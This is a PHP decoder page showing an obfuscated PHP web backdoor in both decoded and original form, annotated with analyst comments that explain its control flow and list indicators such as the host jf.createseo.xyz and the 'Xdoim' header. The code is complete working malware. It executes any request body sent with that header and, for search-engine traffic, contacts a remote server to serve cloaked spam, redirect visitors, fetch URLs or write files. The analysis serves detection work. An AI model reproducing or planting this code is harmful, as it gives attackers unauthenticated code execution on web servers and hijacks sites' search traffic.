PHP Decode
<?php goto RGBbyMlBL6; hs_cRsjJEn: xq4fQ3EYlW: if (!(stripos($cntx, "\x3c\77\170\x6..
Decoded Output download
<?php
/*
 * Analyst notes (comments only; every statement below is unchanged).
 *
 * The goto labels scramble the textual order. In execution order the script:
 *   1. Silences errors, raises the time limit and collects request metadata
 *      (host, URI, referer, user agent, client IP, scheme).
 *   2. If the request carries a non-empty "Xdoim" header ($_SERVER["HTTP_XDOIM"]),
 *      writes the raw request body to ".eGbA0Ty2Wh", include()s it (so it runs
 *      as PHP) and deletes it. The only check is that the header is non-empty,
 *      so this is an unauthenticated code-execution path.
 *   3. Otherwise, only for search-engine crawlers (by User-Agent) or visitors
 *      referred by a search engine to a URI matching the numeric patterns, POSTs
 *      the metadata to http://jf.createseo.xyz/index and acts on the reply:
 *      serves it as the response, redirects, fetches further URLs, or writes a
 *      file to disk.
 *   4. Lets every other request reach the end of the script with no output
 *      (presumably so an including page renders normally; the includer is not
 *      shown here).
 *
 * Indicators visible in this listing: host "jf.createseo.xyz", request header
 * "Xdoim", dot-file ".eGbA0Ty2Wh", version string "2.2.17", group id "4001",
 * and the fixed MSIE 6.0 user agent set in urlx(). Useful hunting points are
 * web-server logs (if request headers are recorded), outbound HTTP from the PHP
 * worker, and unexpected new .txt/.php files written by the web user.
 */
// Entry: jump to the setup segment.
goto RGBbyMlBL6;
// Reply handling: a reply that starts with an XML declaration ("<?xml") is served as text/xml.
hs_cRsjJEn: xq4fQ3EYlW: if (!(stripos($cntx, "<?xml") === 0)) { goto MuWwyNcNba; } @header("Content-type: text/xml"); exit($cntx); MuWwyNcNba: goto f1hqCqLEHx;
// Reply handling: file write. The reply is split on "[,]" into a path and contents and written with todk();
// the script answers "end ok" if the path exists afterwards, otherwise "no false". The two gotos after exit() are dead code.
PgnzjI8kg6: $values = explode("[,]", $cntx); todk($values[0], $values[1]); if (file_exists($values[0])) { goto DPMj8cjSZU; } exit("no false"); goto najghpKSvO; goto S5b1JQDeYx;
// Exit point used after the request-body include at label fiG0iscuwl.
RLLMYh6iEM: exit;
// Gate for contacting the remote host: the URI must not be /favicon.ico, and either the User-Agent matches
// google|yahoo|bing, or the Referer matches a search-engine domain AND the URI matches one of two numeric patterns
// (&& binds tighter than ||). Requests failing the gate jump to ByHqJ_Rs2R and finish silently.
// Passing requests trigger a plain-HTTP POST of the collected metadata; a reply whose Content-Type contains
// "gzip" past offset 0 is routed to iKken36383.
QWhRfhU0D3: if (!($uri !== "/favicon.ico" && (@preg_match("#google|yahoo|bing#i", $ua) || @preg_match("#google.co.jp|google.com|yahoo.com|yahoo.co.jp|bing.com#i", $ur) && (@preg_match("#[/\?]([a-z0-9]{1})[-_/]?(\d+_\d+_\d+)$#i", $uri) || @preg_match("#[/\?]([a-z0-9]{1})[-_/]?(\d+)#i", $uri))))) { goto ByHqJ_Rs2R; } list($cntx, $code, $ctype) = urlx("http://" . $gov . "/index?" . $postdata, $header, $postdata); if (!(stripos($ctype, "gzip") > 0)) { goto cMC7XYJpSg; } goto iKken36383;
// "end ok" exit of the file-write branch, then the check for a reply starting with "ok" (handled at pGe1dLzMA0).
S5b1JQDeYx: DPMj8cjSZU: exit("end ok"); najghpKSvO: JVF7qqfu3N: if (!(stripos($cntx, "ok") === 0)) { goto nZbjOlu1O8; } goto pGe1dLzMA0;
// Setup: suppress error reporting, allow 3600 s of execution, keep running if the client disconnects.
// $ixv is echoed back in the "ok" branch; $gov is the host every lookup is sent to.
RGBbyMlBL6: error_reporting(0); @set_time_limit(3600); @ignore_user_abort(1); $ixv = "2.2.17"; $gov = "jf.createseo.xyz"; goto Uj94AKDcaI;
// Builds the POST body from unescaped request values, then the direct-execution path: with a non-empty Xdoim
// header the raw request body is written to .eGbA0Ty2Wh (relative to the working directory), included, its
// return value echoed, and the file unlinked. todk() declares two parameters, so FILE_USE_INCLUDE_PATH is ignored.
fiG0iscuwl: $postdata = "proto={$proto}&shost={$host}&ip={$ip}&dbgroup={$db}&uri={$uri}"; if (!(strlen($token) > 0)) { goto QWhRfhU0D3; } @todk(".eGbA0Ty2Wh", @file_get_contents("php://input"), FILE_USE_INCLUDE_PATH); echo include ".eGbA0Ty2Wh"; unlink(".eGbA0Ty2Wh"); goto RLLMYh6iEM;
// Request metadata forwarded to the remote host as custom headers. Note the "Dbgroup" header carries $gov (the
// host name), while the POST field "dbgroup" carries $db. All of these values originate from the client request.
ARk5Sw5nGX: $host = $_SERVER["HTTP_HOST"]; $lang = isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : ''; $token = isset($_SERVER["HTTP_XDOIM"]) ? $_SERVER["HTTP_XDOIM"] : ''; $proto = !empty($_SERVER["HTTPS"]) && strtolower($_SERVER["HTTPS"]) !== "off" || isset($_SERVER["HTTP_X_FORWARDED_PROTO"]) && $_SERVER["HTTP_X_FORWARDED_PROTO"] === "https" || !empty($_SERVER["HTTP_FRONT_END_HTTPS"]) && strtolower($_SERVER["HTTP_FRONT_END_HTTPS"]) !== "off" ? "https" : "http"; $header = array("Lang: " . $lang, "User-Agent: " . $ua, "Referer: " . $ur, "Http-Proto: " . $proto, "Http-Host: " . $host, "Http-Uri: " . $uri, "Dbgroup: " . $gov, "Http-X-Forwarded-For: " . $ip, "Token: " . $token); goto fiG0iscuwl;
// Final fallback: any other non-empty reply is sent to the visitor as-is. ByHqJ_Rs2R is where gated-out
// requests land; from there execution only passes the function declarations and reaches the end of the file.
SxGB_IwKQe: if (!($cntx != '')) { goto clUQd1W8Y5; } exit($cntx); clUQd1W8Y5: ByHqJ_Rs2R:
// urlx(): HTTP helper returning array(body, status code, content type). Redirects are followed and TLS peer and
// host verification are both disabled. If curl_exec() returns false it retries with file_get_contents() under a
// fixed MSIE 6.0 user agent. Returns without a value when curl_init() does not exist.
function urlx($url, $header = null, $postdata = null, $ua = null) { if (!function_exists("curl_init")) { return; } try { goto u8ntJVkesP; fC8KffY_pq: curl_setopt($ch, CURLOPT_ENCODING, "gzip,deflate"); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $header === null ? '' : curl_setopt($ch, CURLOPT_HTTPHEADER, $header); $ua === null || $ua === '' ? '' : curl_setopt($ch, CURLOPT_USERAGENT, $ua); goto dK0D9gwGYE; u8ntJVkesP: $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE); goto fC8KffY_pq; GHXL1e4Lnf: $code = curl_getinfo($ch, CURLINFO_HTTP_CODE); $ctype = curl_getinfo($ch, CURLINFO_CONTENT_TYPE); curl_close($ch); goto Vkr8UbmNFd; dK0D9gwGYE: if (!($postdata !== null && $postdata !== '')) { goto wZsI8FqKpJ; } curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata); wZsI8FqKpJ: $body = curl_exec($ch); goto GHXL1e4Lnf; Vkr8UbmNFd: } catch (Exception $e) { } if (!($body === false && function_exists("file_get_contents"))) { goto gKUACpTzzy; } ini_set("user_agent", "Mozilla/4.0 (compatible;MSIE 6.0;Windows NT 5.2;.NET CLR 1.1.4322)"); try { $body = @file_get_contents($url); } catch (Exception $e) { } gKUACpTzzy: return array($body, $code, $ctype); } goto u0slBRQpyr;
// todk(): file_put_contents() with warnings suppressed; the only file-write primitive in the script.
u0slBRQpyr: function todk($fil, $str) { @file_put_contents($fil, $str); } goto WpxJQdbchL;
// Fixed group id plus request fields. clientip() is declared further down in the file; the call still resolves,
// presumably because PHP binds unconditional top-level function declarations when the file is compiled.
Uj94AKDcaI: $db = "4001"; $ip = clientip(); $ur = isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : ''; $ua = isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : ''; $uri = $_SERVER["REQUEST_URI"]; goto ARk5Sw5nGX;
// "ok" reply: echoed back with the host name and version string appended.
pGe1dLzMA0: exit($cntx . " " . $gov . $ixv);
// A 4xx status from the remote host is mirrored to the visitor as 404.
nZbjOlu1O8: if (!($code >= 400 && $code < 500)) { goto g9Fj5z4fAO; } @header("HTTP/1.1 404 Not Found"); exit; goto pdoWXncdWZ;
// Reply starting with "http" and containing "[,]": the part before the marker is a comma-separated URL list and
// the part after it is used as the User-Agent. Each URL is fetched from this server and URL + body are
// concatenated into the response, so the host makes outbound requests chosen by the remote side.
YSrpLJRNn0: if (!strstr($cntx, "[,]")) { goto Sh588TNZsp; } $segs = explode("[,]", $cntx); $lines = explode(",", $segs[0]); $result = ''; foreach ($lines as $url) { list($respbody, $code) = urlx($url, null, null, $segs[1]); $result .= $url . $respbody; cv3m9WSD_2: } goto bIvyHT5Q36; bIvyHT5Q36: Kq9Evupeb_: exit($result);
// Pattern check that selects the file-write branch. The "." before the (txt|php) group is unescaped, so it
// matches any character rather than only a literal dot.
Sh588TNZsp: YBe5lhyBW5: if (!@preg_match("#^[^.]*.(txt|php)#i", $cntx)) { goto JVF7qqfu3N; } goto PgnzjI8kg6;
// Reply starting with "http": if it also contains "?main_page=" the visitor is redirected to it via a Location
// header; otherwise continue to the URL-list check.
f1hqCqLEHx: if (!(stripos($cntx, "http") === 0)) { goto YBe5lhyBW5; } if (!stripos($cntx, "?main_page=")) { goto ibrY2l1xoU; } @header("Location: " . $cntx); exit; ibrY2l1xoU: goto YSrpLJRNn0;
// gzip reply: passed through with Content-type application/x-gzip.
iKken36383: @header("Content-type: application/x-gzip"); exit($cntx);
// A reply that starts with "<!doct" or "<html" is sent as the whole response and the script stops.
cMC7XYJpSg: if (!(stripos($cntx, "<!doct") === 0 || stripos($cntx, "<html") === 0)) { goto xq4fQ3EYlW; } exit($cntx); goto hs_cRsjJEn;
// A 5xx status from the remote host is mirrored as 500; anything else falls to the final fallback.
pdoWXncdWZ: g9Fj5z4fAO: if (!($code >= 500)) { goto SThWxaFL5D; } @header("HTTP/1.1 500 Internal Server Error"); exit; SThWxaFL5D: goto SxGB_IwKQe;
// clientip(): prefers X-Forwarded-For (client-supplied, so spoofable), then getenv("REMOTE_ADDR"), then
// $_SERVER["REMOTE_ADDR"]; returns the first entry when the value is a comma-separated list.
WpxJQdbchL: function clientip() { goto y8tL4h5Wxe; tny4LxycnB: goto KCYxoUwIuy; t2cdQIwC9P: $realip = $_SERVER["REMOTE_ADDR"]; KCYxoUwIuy: if (!stristr($realip, ",")) { goto xwNnn_mLJ6; } goto knjrhnXlG4; y8tL4h5Wxe: $realip = ''; if (isset($_SERVER["HTTP_X_FORWARDED_FOR"]) && $_SERVER["HTTP_X_FORWARDED_FOR"] !== '') { goto OSy2_bZqy2; } if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown")) { goto DP9ihn4YES; } if (isset($_SERVER["REMOTE_ADDR"]) && $_SERVER["REMOTE_ADDR"] && strcasecmp($_SERVER["REMOTE_ADDR"], "unknown")) { goto t2cdQIwC9P; } goto KCYxoUwIuy; goto jv39_Cl83n; jv39_Cl83n: OSy2_bZqy2: $realip = $_SERVER["HTTP_X_FORWARDED_FOR"]; goto KCYxoUwIuy; DP9ihn4YES: $realip = getenv("REMOTE_ADDR"); goto tny4LxycnB; knjrhnXlG4: $values = explode(",", $realip); $realip = $values[0]; xwNnn_mLJ6: return $realip; goto ZPkRr1n15e; ZPkRr1n15e: } ?>
Original Code
<?php
/*
 * Analyst notes (comments only; every statement below is unchanged).
 *
 * Obfuscation: control flow is flattened into goto-linked segments in shuffled
 * order, and every string literal is written as a mix of \x hex and octal
 * escapes. No eval/base64 layer is involved; PHP resolves the escapes itself.
 *
 * Key literals once the escapes are resolved:
 *   $gov                     -> "jf.createseo.xyz"   (remote host contacted)
 *   $ixv                     -> "2.2.17"             (version string)
 *   $_SERVER key for $token  -> "HTTP_XDOIM"         (request header "Xdoim")
 *   scratch file             -> ".eGbA0Ty2Wh"
 *   stream read into it      -> "php://input"        (raw request body)
 *   reply field separator    -> "[,]"
 *
 * Behaviour in execution order: collect request metadata; if the Xdoim header
 * is non-empty, write the request body to the scratch file, include() it and
 * delete it; otherwise, for search-engine crawlers or search-referred visitors
 * on matching URIs, POST the metadata to the remote host and act on the reply
 * (serve it, redirect, fetch further URLs, or write a file). Other requests
 * reach the end of the script with no output.
 */
// Entry: jump to the setup segment.
goto RGBbyMlBL6;
// Reply starting with "<?xml" is served with a text/xml content type.
hs_cRsjJEn: xq4fQ3EYlW: if (!(stripos($cntx, "\x3c\77\170\x6d\x6c") === 0)) { goto MuWwyNcNba; } @header("\x43\x6f\x6e\164\145\x6e\164\55\x74\171\x70\x65\72\x20\164\x65\170\164\57\x78\155\154"); exit($cntx); MuWwyNcNba: goto f1hqCqLEHx;
// File-write branch: reply split on "[,]" into path and contents, written via todk(); exits "no false" if the
// path does not exist afterwards. The two gotos after exit() are dead code.
PgnzjI8kg6: $values = explode("\x5b\x2c\135", $cntx); todk($values[0], $values[1]); if (file_exists($values[0])) { goto DPMj8cjSZU; } exit("\156\157\x20\x66\x61\154\163\x65"); goto najghpKSvO; goto S5b1JQDeYx;
// Exit point used after the request-body include.
RLLMYh6iEM: exit;
// Gate: URI is not "/favicon.ico" and (User-Agent matches google|yahoo|bing, or Referer matches a search-engine
// domain and the URI matches one of two numeric patterns). Failing requests jump to ByHqJ_Rs2R and end silently;
// passing ones POST the metadata to "http://" . $gov . "/index?" and branch on a "gzip" content type.
QWhRfhU0D3: if (!($uri !== "\x2f\x66\x61\x76\151\143\157\156\56\151\143\x6f" && (@preg_match("\x23\x67\x6f\x6f\x67\154\145\x7c\x79\141\150\x6f\x6f\x7c\x62\x69\156\x67\43\x69", $ua) || @preg_match("\43\147\x6f\157\x67\x6c\145\x2e\143\157\56\152\x70\174\147\157\157\x67\x6c\x65\56\143\157\155\x7c\171\x61\150\157\157\56\143\x6f\155\x7c\x79\x61\150\x6f\157\56\143\157\x2e\x6a\x70\x7c\142\x69\x6e\x67\x2e\x63\157\155\x23\x69", $ur) && (@preg_match("\x23\133\57\134\x3f\x5d\x28\133\x61\x2d\x7a\60\55\x39\135\173\61\x7d\51\133\55\x5f\57\x5d\x3f\50\134\144\53\x5f\x5c\144\x2b\x5f\x5c\144\53\51\44\43\151", $uri) || @preg_match("\x23\133\x2f\x5c\77\135\x28\x5b\x61\x2d\x7a\x30\55\71\135\x7b\x31\x7d\51\x5b\55\x5f\x2f\135\x3f\50\134\x64\53\x29\x23\x69", $uri))))) { goto ByHqJ_Rs2R; } list($cntx, $code, $ctype) = urlx("\x68\164\164\x70\72\x2f\x2f" . $gov . "\x2f\151\x6e\x64\x65\170\77" . $postdata, $header, $postdata); if (!(stripos($ctype, "\147\x7a\151\160") > 0)) { goto cMC7XYJpSg; } goto iKken36383;
// "end ok" exit of the file-write branch, then the check for a reply starting with "ok".
S5b1JQDeYx: DPMj8cjSZU: exit("\x65\156\144\40\157\153"); najghpKSvO: JVF7qqfu3N: if (!(stripos($cntx, "\x6f\153") === 0)) { goto nZbjOlu1O8; } goto pGe1dLzMA0;
// Setup: error reporting off, 3600 s time limit, ignore client disconnects; sets the version string and remote host.
RGBbyMlBL6: error_reporting(0); @set_time_limit(3600); @ignore_user_abort(1); $ixv = "\62\x2e\62\x2e\61\67"; $gov = "\x6a\146\x2e\143\x72\145\x61\164\x65\163\x65\157\x2e\170\x79\172"; goto Uj94AKDcaI;
// Builds the POST body (proto, shost, ip, dbgroup, uri), then the direct-execution path: a non-empty token makes
// the script write php://input to the scratch file, include it, echo the include's return value and unlink it.
// todk() declares two parameters, so FILE_USE_INCLUDE_PATH is ignored.
fiG0iscuwl: $postdata = "\x70\162\x6f\x74\157\75{$proto}\46\163\x68\x6f\x73\x74\x3d{$host}\x26\x69\x70\75{$ip}\46\144\142\x67\x72\x6f\165\x70\75{$db}\x26\x75\x72\151\75{$uri}"; if (!(strlen($token) > 0)) { goto QWhRfhU0D3; } @todk("\56\145\107\142\x41\x30\x54\x79\x32\x57\x68", @file_get_contents("\x70\x68\x70\72\57\57\151\156\x70\x75\x74"), FILE_USE_INCLUDE_PATH); echo include "\x2e\145\x47\x62\x41\60\x54\171\x32\127\x68"; unlink("\x2e\145\107\x62\101\60\x54\171\x32\x57\150"); goto RLLMYh6iEM;
// Reads HTTP_HOST, HTTP_ACCEPT_LANGUAGE, HTTP_XDOIM and the HTTPS / forwarded-proto variables, then builds the
// custom header list sent to the remote host. All of these values originate from the client request.
ARk5Sw5nGX: $host = $_SERVER["\x48\x54\124\120\137\x48\x4f\x53\x54"]; $lang = isset($_SERVER["\x48\x54\124\120\x5f\101\103\103\105\120\x54\x5f\114\x41\x4e\x47\x55\101\107\x45"]) ? $_SERVER["\110\124\x54\x50\x5f\101\103\x43\105\x50\x54\x5f\x4c\101\x4e\107\125\x41\x47\105"] : ''; $token = isset($_SERVER["\x48\x54\x54\120\x5f\130\x44\x4f\111\115"]) ? $_SERVER["\x48\x54\x54\x50\x5f\x58\104\x4f\x49\x4d"] : ''; $proto = !empty($_SERVER["\110\124\x54\120\123"]) && strtolower($_SERVER["\x48\124\124\120\123"]) !== "\157\146\x66" || isset($_SERVER["\110\x54\x54\x50\x5f\130\137\x46\117\122\127\101\122\104\105\x44\137\120\x52\117\x54\117"]) && $_SERVER["\110\124\x54\x50\137\x58\137\106\117\122\127\101\x52\x44\x45\x44\137\120\x52\x4f\124\x4f"] === "\150\164\164\x70\163" || !empty($_SERVER["\x48\x54\x54\x50\x5f\x46\122\117\116\x54\x5f\105\x4e\104\x5f\110\124\x54\x50\123"]) && strtolower($_SERVER["\110\x54\x54\120\x5f\106\122\117\116\124\x5f\x45\116\x44\137\110\124\124\x50\x53"]) !== "\x6f\x66\146" ? "\150\164\164\x70\x73" : "\150\x74\x74\160"; $header = array("\x4c\x61\156\147\x3a\x20" . $lang, "\x55\x73\x65\x72\x2d\101\147\145\156\x74\72\x20" . $ua, "\x52\145\146\x65\x72\x65\162\72\x20" . $ur, "\x48\x74\x74\x70\x2d\120\162\x6f\164\x6f\72\40" . $proto, "\x48\x74\164\160\55\x48\x6f\x73\164\72\40" . $host, "\x48\164\164\160\x2d\125\x72\x69\x3a\40" . $uri, "\104\x62\147\162\x6f\165\x70\x3a\40" . $gov, "\110\x74\164\160\55\x58\x2d\x46\x6f\x72\x77\x61\162\x64\x65\144\55\x46\x6f\x72\x3a\40" . $ip, "\x54\157\x6b\x65\156\x3a\x20" . $token); goto fiG0iscuwl;
// Final fallback: any other non-empty reply is sent to the visitor as-is. ByHqJ_Rs2R is the landing label for
// gated-out requests; from there only function declarations remain before the end of the file.
SxGB_IwKQe: if (!($cntx != '')) { goto clUQd1W8Y5; } exit($cntx); clUQd1W8Y5: ByHqJ_Rs2R:
// urlx(): curl-based fetch returning array(body, status code, content type); follows redirects, disables TLS peer
// and host verification, and falls back to file_get_contents() with a fixed user agent when curl_exec() returns false.
function urlx($url, $header = null, $postdata = null, $ua = null) { if (!function_exists("\x63\x75\162\x6c\137\x69\x6e\151\x74")) { return; } try { goto u8ntJVkesP; fC8KffY_pq: curl_setopt($ch, CURLOPT_ENCODING, "\x67\x7a\151\160\54\x64\145\x66\x6c\x61\x74\x65"); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $header === null ? '' : curl_setopt($ch, CURLOPT_HTTPHEADER, $header); $ua === null || $ua === '' ? '' : curl_setopt($ch, CURLOPT_USERAGENT, $ua); goto dK0D9gwGYE; u8ntJVkesP: $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE); goto fC8KffY_pq; GHXL1e4Lnf: $code = curl_getinfo($ch, CURLINFO_HTTP_CODE); $ctype = curl_getinfo($ch, CURLINFO_CONTENT_TYPE); curl_close($ch); goto Vkr8UbmNFd; dK0D9gwGYE: if (!($postdata !== null && $postdata !== '')) { goto wZsI8FqKpJ; } curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata); wZsI8FqKpJ: $body = curl_exec($ch); goto GHXL1e4Lnf; Vkr8UbmNFd: } catch (Exception $e) { } if (!($body === false && function_exists("\x66\151\x6c\x65\x5f\147\145\x74\137\x63\x6f\156\164\145\x6e\x74\163"))) { goto gKUACpTzzy; } ini_set("\165\x73\145\x72\137\x61\147\x65\x6e\x74", "\115\157\x7a\x69\x6c\x6c\x61\x2f\x34\x2e\x30\x20\50\143\157\x6d\x70\141\164\151\x62\154\145\x3b\x4d\x53\x49\x45\40\x36\x2e\x30\x3b\127\151\x6e\144\x6f\x77\x73\x20\116\124\40\x35\56\x32\x3b\56\x4e\105\x54\x20\103\114\x52\40\61\x2e\61\x2e\x34\x33\x32\62\x29"); try { $body = @file_get_contents($url); } catch (Exception $e) { } gKUACpTzzy: return array($body, $code, $ctype); } goto u0slBRQpyr;
// todk(): file_put_contents() with warnings suppressed; the only file-write primitive in the script.
u0slBRQpyr: function todk($fil, $str) { @file_put_contents($fil, $str); } goto WpxJQdbchL;
// Fixed group id "4001" plus HTTP_REFERER, HTTP_USER_AGENT and REQUEST_URI from the request.
Uj94AKDcaI: $db = "4001"; $ip = clientip(); $ur = isset($_SERVER["\110\124\124\120\137\122\x45\106\x45\122\105\122"]) ? $_SERVER["\110\124\x54\120\x5f\x52\x45\x46\x45\x52\x45\x52"] : ''; $ua = isset($_SERVER["\110\x54\x54\x50\137\125\x53\x45\122\137\x41\107\x45\x4e\x54"]) ? $_SERVER["\110\124\x54\120\137\x55\123\105\122\x5f\101\107\105\116\x54"] : ''; $uri = $_SERVER["\x52\105\x51\125\105\123\124\137\125\122\111"]; goto ARk5Sw5nGX;
// "ok" reply: echoed back with a space, the host name and the version string appended.
pGe1dLzMA0: exit($cntx . "\40" . $gov . $ixv);
// A 4xx status from the remote host is mirrored to the visitor as "HTTP/1.1 404 Not Found".
nZbjOlu1O8: if (!($code >= 400 && $code < 500)) { goto g9Fj5z4fAO; } @header("\x48\x54\124\120\57\x31\56\61\40\x34\x30\x34\40\116\x6f\x74\40\x46\x6f\x75\156\144"); exit; goto pdoWXncdWZ;
// Reply containing "[,]": comma-separated URL list before the marker, User-Agent after it; each URL is fetched
// from this server and URL + body are concatenated into the response.
YSrpLJRNn0: if (!strstr($cntx, "\x5b\54\x5d")) { goto Sh588TNZsp; } $segs = explode("\x5b\x2c\135", $cntx); $lines = explode("\x2c", $segs[0]); $result = ''; foreach ($lines as $url) { list($respbody, $code) = urlx($url, null, null, $segs[1]); $result .= $url . $respbody; cv3m9WSD_2: } goto bIvyHT5Q36; bIvyHT5Q36: Kq9Evupeb_: exit($result);
// Pattern check (case-insensitive, ends in a txt|php alternation) that selects the file-write branch.
Sh588TNZsp: YBe5lhyBW5: if (!@preg_match("\x23\x5e\x5b\136\56\x5d\x2a\56\50\164\x78\x74\174\160\150\x70\x29\x23\x69", $cntx)) { goto JVF7qqfu3N; } goto PgnzjI8kg6;
// Reply starting with "http": redirect via a Location header when it also contains "?main_page=", otherwise
// continue to the URL-list check.
f1hqCqLEHx: if (!(stripos($cntx, "\x68\164\164\x70") === 0)) { goto YBe5lhyBW5; } if (!stripos($cntx, "\x3f\155\141\151\x6e\137\160\x61\x67\145\75")) { goto ibrY2l1xoU; } @header("\x4c\x6f\x63\x61\x74\x69\157\x6e\72\x20" . $cntx); exit; ibrY2l1xoU: goto YSrpLJRNn0;
// gzip reply: passed through with an application/x-gzip content type.
iKken36383: @header("\x43\157\x6e\164\x65\x6e\x74\x2d\164\x79\160\145\x3a\40\141\x70\160\154\x69\143\141\164\151\x6f\x6e\x2f\x78\x2d\147\x7a\x69\160"); exit($cntx);
// A reply that starts with "<!doct" or "<html" is sent as the whole response and the script stops.
cMC7XYJpSg: if (!(stripos($cntx, "\74\x21\x64\157\143\x74") === 0 || stripos($cntx, "\74\150\x74\x6d\x6c") === 0)) { goto xq4fQ3EYlW; } exit($cntx); goto hs_cRsjJEn;
// A 5xx status from the remote host is mirrored as "HTTP/1.1 500 Internal Server Error".
pdoWXncdWZ: g9Fj5z4fAO: if (!($code >= 500)) { goto SThWxaFL5D; } @header("\110\x54\x54\120\57\x31\x2e\x31\40\x35\x30\x30\x20\111\156\164\x65\162\156\x61\154\x20\123\145\162\166\145\162\x20\105\x72\162\x6f\162"); exit; SThWxaFL5D: goto SxGB_IwKQe;
// clientip(): prefers HTTP_X_FORWARDED_FOR (client-supplied, so spoofable), then getenv("REMOTE_ADDR"), then
// $_SERVER["REMOTE_ADDR"]; returns the first entry when the value is a comma-separated list.
WpxJQdbchL: function clientip() { goto y8tL4h5Wxe; tny4LxycnB: goto KCYxoUwIuy; t2cdQIwC9P: $realip = $_SERVER["\x52\105\x4d\117\124\x45\x5f\101\104\104\122"]; KCYxoUwIuy: if (!stristr($realip, "\x2c")) { goto xwNnn_mLJ6; } goto knjrhnXlG4; y8tL4h5Wxe: $realip = ''; if (isset($_SERVER["\x48\124\x54\120\x5f\x58\137\106\117\122\127\x41\122\x44\105\x44\x5f\x46\x4f\122"]) && $_SERVER["\110\x54\124\120\x5f\x58\x5f\106\x4f\x52\127\101\x52\x44\x45\x44\137\106\x4f\x52"] !== '') { goto OSy2_bZqy2; } if (getenv("\x52\x45\x4d\x4f\x54\105\x5f\x41\x44\x44\x52") && strcasecmp(getenv("\122\105\x4d\x4f\x54\105\137\x41\104\x44\x52"), "\x75\x6e\153\x6e\157\167\x6e")) { goto DP9ihn4YES; } if (isset($_SERVER["\x52\x45\115\117\124\x45\x5f\101\104\x44\122"]) && $_SERVER["\122\105\x4d\x4f\124\x45\137\x41\104\x44\x52"] && strcasecmp($_SERVER["\122\105\115\117\124\105\137\x41\x44\104\122"], "\165\156\153\x6e\157\x77\156")) { goto t2cdQIwC9P; } goto KCYxoUwIuy; goto jv39_Cl83n; jv39_Cl83n: OSy2_bZqy2: $realip = $_SERVER["\x48\124\x54\120\137\x58\137\x46\x4f\122\x57\x41\x52\104\x45\x44\x5f\x46\117\x52"]; goto KCYxoUwIuy; DP9ihn4YES: $realip = getenv("\x52\105\x4d\x4f\x54\x45\x5f\x41\x44\104\122"); goto tny4LxycnB; knjrhnXlG4: $values = explode("\x2c", $realip); $realip = $values[0]; xwNnn_mLJ6: return $realip; goto ZPkRr1n15e; ZPkRr1n15e: } ?>
Function Calls
None |
Stats
MD5 | d4aa059df36450f947fad6d2b948b365 |
Eval Count | 0 |
Decode Time | 60 ms |